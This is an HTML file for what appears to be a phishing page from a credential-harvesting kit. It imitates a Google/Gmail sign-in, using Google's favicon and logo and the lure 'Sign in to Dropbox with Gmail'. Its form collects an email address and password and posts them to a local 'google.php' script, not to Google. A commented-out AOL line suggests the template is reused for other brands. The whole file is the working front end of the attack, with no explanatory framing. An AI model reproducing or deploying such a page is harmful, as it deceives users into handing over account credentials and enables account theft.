<html>
<head>
      <title>Gmail</title>
	  <link rel="shortcut icon" href="http://www.google.com/favicon.ico"/>
	  <link href="stylelg.css" rel="stylesheet" type="text/css" />
   </head>
<body>
  <div id="wrapper"> 
     <div id="list1">
		
	 </div>
	 <div id="list2">
		<h1>One account. All of Google. </h1>
	 </div>
	 <div id="list3">
		<h2>Sign in to Dropbox with Gmail</h2>
	 </div>

	<div id="content">
			
	    <div id="fom1">
	      <form method="post" action="google.php" autocomplete="off">
		      <div id="log"></div>
              <fieldset>
    
               <div class="in1" style=" position:relative; bottom:4px;"><input style="padding-left:10px;" type="email" name="email" id="Email" maxlength='96' tabindex='1' aria-required="true" placeholder="Email" autocomplete="off" value="" required="" oninvalid="this.setCustomValidity('Incorrect email address: someone@gmail.com')" oninput="setCustomValidity('')"></div>
              <div class="in1"><input style="padding-left:10px;" type="password" name="password" maxlength='64' tabindex='2' aria-required="true" placeholder="Password" autocorrect="off" autocomplete="off" value="" required="" oninvalid="this.setCustomValidity('Error: incorrect password')" oninput="setCustomValidity('')"></div>
		         
            <div id="but"> <input id="but1" type="submit" value="Sign In"></div>
			<div id="cb-got">
					<div id="got"><a href="#">Need help?</a></div>
					<div> <input type="checkbox" id="cb" /> <label id="me" for="cb">Stay signed in</label></div>
				 </div>
            </fieldset>
			<!-- <div id="free"><a href="#">FREE Trial 	&#8210; AOL Security Bundle</a></div> -->
          </form>
		
	    </div>
		<div id="get"><a href="#">Create an account</a></div>
				
		<div id="get2">
			One Google Account for everything Google 
			<div id="get3">
				<img src="wlogostrip_230x17_1x.png" alt="logo" height="17px" width="230px">
		</div>
		</div>  
    </div>

  </div>
     <div id="footer">
					<span>Google &nbsp; &nbsp; <a href="#">Privacy & Terms </a> &nbsp; <a href="#">help </a></span>
					
   </div>
</body>
</html>